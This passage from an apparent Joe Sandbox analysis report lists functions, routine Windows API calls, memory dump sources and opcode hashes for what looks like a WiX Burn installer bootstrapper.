Instruction ID: 52104c67a2bdb4add7545d78422f31ba34eb005bf684b944c8295abed5640686
Opcode Fuzzy Hash: 67747f5d2486f7d7b4148ce79a92e77449f30c78a2079d0d8d566a7f268b316f
Instruction Fuzzy Hash: 952186B6D01339A7DF209BA49D49FEA776EDB04720F114165FD15EB341EA30DE4487A0

Function 6C8DAD91 Relevance: 4.5, APIs: 3, Instructions: 40COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C8DADA0
KiUserCallbackDispatcher.NTDLL(00000000,6C8D2C02), ref: 6C8DADCC
ShowWindow.USER32(00000000,6C8D2C02,?,00000000), ref: 6C8DADE1

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CallbackDispatcherItemShowUserWindow
String ID:
API String ID: 3248985991-0
Opcode ID: 7cedee5bc9c2780fd447b4e8c40451fbc968841c6d397936f35c2fa8267abf09
Instruction ID: ab7578db8b2e0c4ae99c6f09eb072674c504ca558ae0cd21ad9e1e1bf22f1701
Opcode Fuzzy Hash: 7cedee5bc9c2780fd447b4e8c40451fbc968841c6d397936f35c2fa8267abf09
Instruction Fuzzy Hash: A5F0F636501A24BB87315E19CC48DE77B2CEF4A66E722452AFE5593640C771F810C7E0

Function 006D124D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000008,00000000,00000000,00000000,000000B0,000002C0,00000000,00000000), ref: 006D127B

Strings

regutil.cpp, xrefs: 006D12C5

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: beec54b45f2e6e84872866429300aa9329774cd15a0150a054d0ce7113539789
Instruction ID: e996cfa946bd616bdf7765c544ead474067d0df38348f72ab90472c5dff147d2
Opcode Fuzzy Hash: beec54b45f2e6e84872866429300aa9329774cd15a0150a054d0ce7113539789
Instruction Fuzzy Hash: EE216272D01119BFDF209E95CC459AEBBABEF45350F1181AAF914EB310D2728E81D790

Function 0069F5E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,006D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 006D0E52

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,006A7B4D,?,?,?), ref: 0069F644

Part of subcall function 006D0EEC: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,00000000,?,?,?,0069F619,00000000,Installed,00000000,?,?), ref: 006D0F10

Strings

Installed, xrefs: 0069F60C

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: 2b5a61270cfe73d1a486887fdcecea9d95d8f9d37e4baf7cd6c1e1346e7d8fe3
Instruction ID: 27778bfa6854d05405ccc6e550b25d5dfae35b2dc6e89119ee540778247a0403
Opcode Fuzzy Hash: 2b5a61270cfe73d1a486887fdcecea9d95d8f9d37e4baf7cd6c1e1346e7d8fe3
Instruction Fuzzy Hash: 34018F32921218FFDF11DB94C846BDEBBAEEF04321F1241A9E800E7220D3765E50DB94

Function 6C8DCFC9 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(?), ref: 6C8DCFD8
GdipFree.GDIPLUS(?,?), ref: 6C8DCFEA

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Gdip$DisposeFreeImage
String ID:
API String ID: 1950503971-0
Opcode ID: d4b1dd77e22e8f2b6d39244128ed93b6b0dc044eae37231b0dbf419510c6d61a
Instruction ID: 0cbac2923b230edbbdee93638a59353f16a21dce1ebc7e3e9e26a7e088aa5016
Opcode Fuzzy Hash: d4b1dd77e22e8f2b6d39244128ed93b6b0dc044eae37231b0dbf419510c6d61a
Instruction Fuzzy Hash: 93E0267210D21C21C2312A089601BC97BCC8F06398F118C2AFE8051B82CFE6788C53DA

Function 6C8D5B06 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?), ref: 6C8D5B17
RtlAllocateHeap.NTDLL(00000000,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?,00000001), ref: 6C8D5B1E

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 256e63272e53adc1a3c5a659763c15a2ec1cd5ef6609067c367aafbc2267eb6c
Instruction ID: 0054ffd7112ca45c196baaae219bfb4fb6be4f1f1cd3f8af7aefc9e9e26af8be
Opcode Fuzzy Hash: 256e63272e53adc1a3c5a659763c15a2ec1cd5ef6609067c367aafbc2267eb6c
Instruction Fuzzy Hash: 6AC012332A020CEB8F516EF8EC0AC9A3BACBBA96067048425B905C2000C639E010CBA0

Function 006D3499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006D34CE

Part of subcall function 006D2F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,006D34DF,00000000,?,00000000), ref: 006D2F3D
Part of subcall function 006D2F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,006BBDED,?,006952FD,?,00000000,?), ref: 006D2F49

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 2310d17d7d773fd10470381904570cf440cbd2d739061954b9725a936df0935c
Instruction ID: 1f3e3fedca3259ef4dff3920293d64d7d33ec3ad6f55031681d8a0fadb433d40
Opcode Fuzzy Hash: 2310d17d7d773fd10470381904570cf440cbd2d739061954b9725a936df0935c
Instruction Fuzzy Hash: 0F312DB6E006299BCB11DFA8D884ADEF7F9EF08710F01456AED15EB311D670DD048BA5

Function 006D907D Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006D8CFB: lstrlenW.KERNEL32(00000100,?,?,006D9098,000002C0,00000100,00000100,00000100,?,?,?,006B7B40,?,?,000001BC,00000000), ref: 006D8D1B

RegCloseKey.KERNELBASE(000002C0,000002C0,00000100,00000100,00000100,?,?,?,006B7B40,?,?,000001BC,00000000,00000000,00000000,00000100), ref: 006D9136

Part of subcall function 006D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,006D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 006D0E52

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CloseOpenlstrlen
String ID:
API String ID: 514153755-0
Opcode ID: 475a01f43657a95f8cc30766a9ba63d97261e46fbd9b967d35b57b81fbb4248c
Instruction ID: 86941d644d0914b98d6dfc77662af0c503e3ed5c0338c3b796bd16832a8b9f8b
Opcode Fuzzy Hash: 475a01f43657a95f8cc30766a9ba63d97261e46fbd9b967d35b57b81fbb4248c
Instruction Fuzzy Hash: 96212476C0152AEBCF31AFA4DC458DEBAB6EB44750B11466BFD01A7321D6324E50D7E0

Function 006D5728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,006FAAA0,00000000,80070490,0085EEB0,?,006A890E,WiX\Burn,PackageCache,00000000,006FAAA0,00000000,00000000,80070490), ref: 006D5782

Part of subcall function 006D0F6E: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006D0FE4
Part of subcall function 006D0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 006D101F

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: a3089643c74c4aebdcc12890b6fc651bc5a0a72519383d46fcef4f850184e477
Instruction ID: f1e3cfb1882660c17c43ff33812f7f20ef5c19c89512179aa0ecd32a47285e9a
Opcode Fuzzy Hash: a3089643c74c4aebdcc12890b6fc651bc5a0a72519383d46fcef4f850184e477
Instruction Fuzzy Hash: A311A336C00529EBCF21AEA49C819EEB66BEB04320B25423BED0267710C3314D50DAD0

Function 006C5154 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,006C1E90,?,0000015D,?,?,?,?,006C32E9,000000FF,00000000,?,?), ref: 006C5186

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: acf1f8dd826e1acb46b06161e992ecedaa9ff67ca3ce93037d1e461a1e3071eb
Instruction ID: 0aeab7890ee029badcd6bc4828d9085c853226753fed86ec639d0e4b723fcdf2
Opcode Fuzzy Hash: acf1f8dd826e1acb46b06161e992ecedaa9ff67ca3ce93037d1e461a1e3071eb
Instruction Fuzzy Hash: 45E0E531240B3497D77126658C08FBB364BDB417F0F0D411DAC2796A90DF20EC8182A4

Function 6C8D4E81 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00008068,00000000,?), ref: 6C8D4EBE

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: cca73adbf6f5213e27eec696de6992f0dc6c7852e676ca5e080b5161de68d4c1
Instruction ID: 2ee9621e2450f0da61a388e7f8ee7cf98c1217a6f1e2a790068066f149af7dbb
Opcode Fuzzy Hash: cca73adbf6f5213e27eec696de6992f0dc6c7852e676ca5e080b5161de68d4c1
Instruction Fuzzy Hash: 5BE01A30241306AAE7209F61E908B9537E8AB84729F24C93AE509ED591E772B457CB10

Function 006934C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,006A89CA,0000001C,80070490,00000000,00000000,80070490), ref: 006934E5

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 3e8684b939bf28293eb8d6ead38059f05e835d4b8a6d4bc0f5a03041d7d86f75
Instruction ID: ebb0f35773988e9a3010701777cf6bc99a7f8c7f022bb91aee43ef2e000e1390
Opcode Fuzzy Hash: 3e8684b939bf28293eb8d6ead38059f05e835d4b8a6d4bc0f5a03041d7d86f75
Instruction Fuzzy Hash: 6EE0C2722012257BAF022E625C05CEB3BCEDF057507028015FE00D6500EA20E90092B4

Function 006940E2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,?,006AA229,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,80070490), ref: 006940EB

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 063fd9a96160301fdbf10f3c4f492047edc9fd4a687079605b5ef4b8f819be5d
Instruction ID: cb30740f868c842619e2728a74864828a6d0971837227b5b9c9452b37203f2f7
Opcode Fuzzy Hash: 063fd9a96160301fdbf10f3c4f492047edc9fd4a687079605b5ef4b8f819be5d
Instruction Fuzzy Hash: 91D02B31202124574F189E698C049F67B1FDF127B03014215EC14CA6A0CB308C63C3C0

Function 6C8DB59C Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON

Download Yara Rule

APIs

IsDialogMessageW.USER32(?,?), ref: 6C8DB5AC

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: DialogMessage
String ID:
API String ID: 547518314-0
Opcode ID: c44c64c91a793703174f8b8e09d454f000325310ed4571ee822d46408cceddb2
Instruction ID: d8e027b09dad29c21269bc3bc3f4969e6829b0c3614b6e511358d250361f28a7
Opcode Fuzzy Hash: c44c64c91a793703174f8b8e09d454f000325310ed4571ee822d46408cceddb2
Instruction Fuzzy Hash: D9C0803121424DDF9F51CF54DD40E2F77B9AB157047014424F804C2520D731F960D754

Function 006CF36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006CF35B

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a4c74ae3cd25cf5bde3f96662a268926558dd1587eb690da605744b3c1e93fd1
Instruction ID: f0fcd8454add05e4e826dfe231ae9fe4bf3d8e4ddc3d4389d317e7a419429bd6
Opcode Fuzzy Hash: a4c74ae3cd25cf5bde3f96662a268926558dd1587eb690da605744b3c1e93fd1
Instruction Fuzzy Hash: 91B012E16684097D328453541D03D36014FC1C2F20335C43FB618C6144ECC40C061032

Function 006CF37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006CF35B

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e90659f0f069cdf357522b81537779764103ae034e57eb972cbc923ad105792d
Instruction ID: 67f154e241ca6df16d3db840a8a2e69a795accf5b367063575622b5e736bd0c2
Opcode Fuzzy Hash: e90659f0f069cdf357522b81537779764103ae034e57eb972cbc923ad105792d
Instruction Fuzzy Hash: 86B012E16685097C328453541C02D36014FC1C2F20335C53FF618C6140ECC01C451032

Function 006CF349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006CF35B

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 590e07e135deae993574e62b15702dbb60e5870ab48fa93fb211e1bb6aab455f
Instruction ID: 25f70bf2f293aaaa9d2d9791b57affdf5e42a2b75c84e6237d75ab7ef7f1b8b1
Opcode Fuzzy Hash: 590e07e135deae993574e62b15702dbb60e5870ab48fa93fb211e1bb6aab455f
Instruction Fuzzy Hash: 4AB012E26684097C324413506C02C36020FC1C2F24335C43FBB14D5040ECC40D051032

Function 006D94F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006D94E7

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7d7452ed297d242dcf03033b6c2371b91919d3b737a6867167707e0f4a55fe43
Instruction ID: 7c494c099d84608b7900c87c94006a90e7f777666aab699e9a8b708098336c6e
Opcode Fuzzy Hash: 7d7452ed297d242dcf03033b6c2371b91919d3b737a6867167707e0f4a55fe43
Instruction Fuzzy Hash: A0B012D6B784066C338466581C03C36018FC5C2F11331C57FB704C3382FC800C0A1032

Function 006D94D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006D94E7

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14c7462aec59d815b704edab2f7df70bee3591835d97fbdcbef790b49e170049
Instruction ID: 13720e67592d09c5ff1ffaa7e695f7e8e068e885ef44098eb9cfbcf120f983f4
Opcode Fuzzy Hash: 14c7462aec59d815b704edab2f7df70bee3591835d97fbdcbef790b49e170049
Instruction Fuzzy Hash: 06B012D5B785097C334426541C42C36010FD9C3F10331C57FB300E2386BC800C061033

Function 006D9506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006D94E7

Part of subcall function 006D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006D9891
Part of subcall function 006D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D98A2

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 31a2e993ba3602764d2236bd749837cfe6b8f50e6f8d61f93e42fb599611b4d5
Instruction ID: 31988b335819e01bb3602a2f625a547293c2ec0568a0f328a51f4230e69aa8a1
Opcode Fuzzy Hash: 31a2e993ba3602764d2236bd749837cfe6b8f50e6f8d61f93e42fb599611b4d5
Instruction Fuzzy Hash: E3B09295A686056C228466942A02836014AC9C2F10321856BB204D2382A8800C061032

Function 6C8D788F Relevance: 1.3, APIs: 1, Instructions: 88stringCOMMON

Download Yara Rule

APIs

